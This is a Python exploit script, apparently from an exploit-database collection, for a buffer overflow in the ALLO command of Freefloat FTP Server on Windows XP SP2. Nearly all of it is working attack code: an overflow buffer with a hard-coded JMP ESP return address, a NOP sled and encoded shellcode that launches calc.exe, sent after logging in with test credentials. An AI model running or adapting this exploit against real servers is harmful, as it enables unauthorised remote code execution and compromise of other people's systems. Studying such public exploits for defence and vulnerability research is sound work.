#!/usr/bin/python # Exploit Title: Freefloat FTP Server ALLO Buffer Overflow Vulnerability # Date: 2011 Aug 20 # Author: Black.Spook # Software Link: http://www.freefloat.com/software/freefloatftpserver.zip # Tested on: Windows XP SP2 EN import socket import sys def usage(): print "usage : ./freefloatftp.py " print "example: ./freefloatftp.py 192.168.1.100 21" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "\n" print "#############################################################################" print "# Freefloat FTP Server ALLO Buffer Overflow Vulnerability Exploit #" print "#############################################################################" print "\n" if len(sys.argv) != 3: usage() sys.exit() ip = sys.argv[1] port = sys.argv[2] junk1= "\x41" * 246 ret = "\xED\x1E\x94\x7C" #7C941EED JMP ESP nop = "\x90"* 200 # windows/exec CMD=calc.exe shellcode =("\x89\xe3\xdb\xd4\xd9\x73\xf4\x5d\x55\x59\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" "\x42\x75\x4a\x49\x4d\x6f\x58\x70\x56\x4f\x54\x70\x4d\x6e" "\x58\x59\x58\x4b\x54\x69\x5a\x69\x4d\x61\x56\x53\x4b\x69" "\x52\x54\x45\x74\x4b\x44\x43\x6a\x45\x61\x50\x7a\x45\x42" "\x4d\x53\x58\x42\x54\x44\x43\x33\x4d\x5a\x45\x71\x58\x52" "\x50\x4b\x4d\x46\x5a\x76\x4d\x4b\x4c\x74\x43\x56\x45\x77" "\x49\x6c\x45\x6d\x4c\x43\x56\x76\x54\x6e\x56\x39\x4b\x70" "\x54\x4b\x4b\x4e\x51\x39\x4d\x54\x4d\x77\x51\x65\x51\x6f" "\x45\x6c\x54\x73\x49\x6b\x4d\x78\x45\x63\x4c\x34\x58\x36" "\x4e\x6e\x50\x7a\x47\x75\x54\x37\x56\x6f\x58\x50\x4b\x75" "\x47\x69\x49\x63\x47\x5a\x54\x5a\x4b\x4a\x5a\x6a\x4b\x55" "\x50\x6f\x4b\x4b\x54\x4b\x45\x4b\x4d\x4f\x4d\x79\x58\x44" "\x56\x30\x54\x72\x51\x4e\x51\x70\x47\x54\x4e\x6f\x43\x6f" "\x4e\x46\x51\x33\x4c\x6f\x56\x47\x5a\x63\x5a\x53\x43\x74" "\x5a\x32\x49\x5a\x45\x73\x58\x74\x4e\x49\x4e\x65\x4b\x6b" "\x51\x6e\x49\x65\x50\x35\x49\x4a\x51\x43\x5a\x45\x56\x6a" "\x4d\x45\x4e\x38\x49\x4e\x49\x69\x56\x44\x54\x49\x54\x6f" "\x47\x71\x52\x37\x50\x75\x49\x6c\x47\x4c\x4e\x78\x50\x78" "\x4b\x4c\x52\x59\x47\x6e\x45\x33\x4c\x4b\x52\x51\x51\x4d" "\x47\x6e\x4e\x6c\x43\x71\x47\x6c\x4f\x34\x56\x79\x43\x64" "\x4c\x46\x4e\x6f\x4f\x4a\x4d\x6c\x56\x57\x47\x33\x43\x6c" "\x47\x46\x47\x4b\x47\x58\x45\x7a\x54\x50\x43\x6f\x4e\x4f" "\x4b\x4f\x54\x6a\x51\x4b\x54\x64\x49\x6e\x4b\x4c\x5a\x4a" "\x51\x6e\x56\x45\x4e\x39\x4c\x77\x54\x65\x43\x74\x54\x38" "\x47\x6d\x4c\x4b\x50\x79\x4c\x5a\x58\x79\x50\x74\x4b\x6c" "\x4e\x30\x5a\x4b\x51\x71\x52\x46\x4d\x6b\x45\x31\x51\x67" "\x58\x6a\x4b\x71\x5a\x6c\x52\x57\x4b\x44\x4b\x79\x51\x6e" "\x54\x50\x4f\x35\x43\x72\x56\x71\x50\x67\x5a\x7a\x4b\x30" "\x50\x56\x4f\x67\x4e\x70\x4b\x39\x49\x6e\x50\x30\x43\x4d" "\x51\x48\x52\x63\x51\x4d\x51\x6e\x58\x36\x4b\x37\x56\x38" "\x49\x6d\x54\x73\x52\x57\x4f\x6f\x47\x6d\x45\x66\x51\x62" "\x4b\x6b\x4c\x59\x4f\x5a\x54\x4e\x54\x34\x52\x6c\x58\x4d" "\x4d\x6d\x50\x75\x51\x55\x4c\x6e\x45\x70\x58\x66\x54\x45" "\x47\x6f\x5a\x67\x4c\x4e\x4e\x4c\x51\x4f\x41\x41") buff = junk1 + ret + nop + shellcode try: print("[-] Connecting to " + ip + " on port " + port + "\n") s.connect((ip,int(port))) data = s.recv(1024) print("[-] Sending exploit...") s.send("USER test\r\n") s.recv(1024) s.send("PASS test\r\n") s.recv(1024) s.send("ALLO "+buff+"\r\n") s.close() print("[-] Exploit successfully sent...") except: print("[-] Connection error...") print("[-] Check if victim is up.")